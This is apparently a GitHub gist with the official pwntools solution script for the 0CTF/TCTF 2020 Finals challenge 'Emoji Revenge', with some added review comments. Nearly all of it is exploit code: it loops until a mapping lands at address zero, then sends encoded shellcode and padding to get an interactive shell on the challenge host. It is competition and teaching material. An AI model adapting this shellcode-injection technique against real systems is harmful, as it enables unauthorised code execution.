
@0xKira
Created September 27, 2020 05:25
Official solution for 0CTF/TCTF 2020 Finals challenge Emoji Revenge
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Kira / AAA"
from pwn import context, remote, process, ELF
from pwn import pause, log
import sys
# pwntools setting: the terminal command pwntools uses when it needs to
# open a new window.
context.update(terminal='zsh')

# Module-level state shared by init_buffer() and exploit():
#   p       -- the active pwntools tube; assigned inside exploit()
#   _remote -- True selects the network target instead of the local binary
p, _remote = None, False
def init_buffer():
    """Pick the 🍺 menu entry and read up to the reported mmap() address.

    Waits for the menu prompt on the module-level tube ``p``, sends the 🍺
    choice, then consumes output through the ``mmap() at @`` marker. The
    address that follows the marker is left unread for the caller.
    """
    menu_prompt = '🐮🍺\n'
    beer_choice = '🍺'
    address_marker = 'mmap() at @'

    p.sendlineafter(menu_prompt, beer_choice)
    p.recvuntil(address_marker)
def exploit(host='', port=1337):
    """Run the challenge solution against the local binary or the remote service.

    Connects to ``host:port`` when the module-level ``_remote`` flag is set,
    otherwise starts ``./emoji_revenge`` locally. It then repeats the 🍺 menu
    action until the service reports ``(nil)`` as the mmap() address, selects
    the 🐴 action, sends one prepared payload and switches to interactive mode.

    NOTE(review): the byte-string literals and the ``addr == '(nil)'``
    comparison rely on Python 2 ``str`` semantics, so the script presumably
    targets Python 2. Under Python 3, pwntools returns ``bytes`` and that
    comparison would never match. Confirm before reuse.

    NOTE(review): the listing this was taken from had lost its indentation;
    the extent of the ``while`` loop below is reconstructed. Confirm against
    the original gist.

    Args:
        host: Remote hostname; only read when ``_remote`` is true.
        port: Remote TCP port; only read when ``_remote`` is true.
    """
    global p, _remote
    if _remote:
        p = remote(host, port)
    else:
        # Local run: LD_PRELOAD is set to the empty string for the child.
        p = process('./emoji_revenge', env={'LD_PRELOAD': ''})
    # context.log_level = 'debug'
    # Keep requesting a new mapping until the printed address is "(nil)".
    # glibc prints a NULL pointer as "(nil)" with %p, so this presumably
    # means the mapping address is 0 (verify against the challenge binary).
    while True:
        init_buffer()
        addr = p.recvline().strip()
        if addr == '(nil)':
            break
    # Select the 🐴 menu action and discard the line it prints.
    p.sendlineafter('🐮🍺\n', '🐴')
    p.recvline()
    # pause()
    # Pre-encoded first stage from the author, kept verbatim. The literal is
    # raw bytes shaped like multi-byte sequences, including the legacy 5- and
    # 6-byte UTF-8 forms. Presumably the target decodes its input into wide
    # characters; confirm against the binary.
    w_sc = '\xfd\x9f\x95\xb6\xa1\xaa\xfd\xa2\x8b\xbb\xa1\x88\xfc\xaf\x8b\xb6\xb9\xa9\xfd\x88\x94\x87\x8c\xaf\xfd\x9f\x95\xbe\x9e\x89\xf9\x9a\x97\x89\xa8\xfc\xa4\x8d\x88\x84\x81\xf9\x80\x90\x84\x81\xfd\xaa\x95\xaf\x98\xb1\xfd\x9f\x95\xb5\xb8\x88\xfd\x96\xb9\xa0\x85\x88\xfc\xb1\xb9\xa8\xa5\x88\xfd\x98\x8e\xb6\xab\x92\xd4\x8f'
    payload = w_sc
    # `//` binds tighter than `-`, so this is 0x80 - 14 = 114 filler
    # characters. Presumably 56 is the stage size in bytes and 4 the
    # wide-character width (TODO confirm).
    payload += 'A' * (0x80 - 56 // 4)
    payload += '\xef\xbb\xab\x00' # \xeb\xfe inf loop
    # Right-pad the Python string with 'A' up to 0x10a characters.
    payload = payload.ljust(0x10a, 'A')
    p.sendline(payload)
    p.interactive()
if __name__ == '__main__':
    # A first command-line argument of exactly 'r' selects the remote target;
    # anything else, or no argument, runs against the local binary.
    if sys.argv[1:2] == ['r']:  # remote
        _remote = True
    # exploit() only uses the host and port when _remote is set.
    exploit('chall.0ops.sjtu.edu.cn', 31323)